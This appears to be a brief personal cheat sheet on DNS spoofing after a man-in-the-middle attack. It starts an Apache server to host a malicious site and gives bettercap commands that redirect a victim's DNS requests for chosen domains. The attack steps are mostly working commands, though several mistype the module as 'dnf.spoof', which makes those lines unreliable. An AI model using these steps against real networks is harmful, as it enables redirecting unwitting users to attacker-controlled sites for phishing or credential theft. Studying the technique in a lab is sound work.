After performing MITM attack all the targets packets are flowing through our system. We can redirect the user to an malicious website by spoofing the DNS request of the user
Start Apache Server
systemctl start apache2.service
/var/www/html
: Location of Apache Files
DNS Spoofing
bettercap -iface <interface> -caplet <spoof-data-cap-file>
help dns.spoof
set dnf.spoof.all true
# Domains for which DNS should be spoofed
set dnf.spoof.domains <domains>
dnf.spoof on
This attack does not work on HSTS websites